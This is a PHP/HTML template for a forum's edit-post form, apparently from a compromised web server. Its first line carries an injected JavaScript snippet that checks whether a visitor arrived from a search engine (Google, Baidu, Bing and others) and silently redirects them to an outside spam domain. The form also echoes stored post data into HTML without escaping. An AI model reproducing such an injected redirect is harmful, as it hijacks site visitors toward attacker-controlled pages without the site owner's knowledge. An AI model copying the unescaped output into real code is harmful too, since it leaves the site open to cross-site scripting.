d:\wwwroot\wuchunhua\bbs5\bbs5\tpl\index\updateft.html
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>?title>{$list1}</title>
002:
<h1>修改帖子</h1>
003:
004:
<html>
005:
<form name="form1" method="post" action="__URL__/do_update">
006:
<input type="hidden" name="hid" value="<?php echo $data['id']?>"/>
007:
文章标题
008:
<label>
009:
<input type="text" name="title" value ="<?php echo $data['title'] ?>">
010:
</label>
011:
<p>文章内容
012:
<label>
013:
<textarea name="contents" ><?php echo $data['content'] ?></textarea>
014:
</label>
015:
</p>
016:
<p>
017:
<label>
018:
<input type="submit" name="Submit" value="修改帖子">
019:
</label>
020:
更新时间: <?php echo $data['updatetime']; ?>
021:
</p>
022:
<p> </p>
023:
</form>
024:
</html>
025:
026:
027:
028:
029: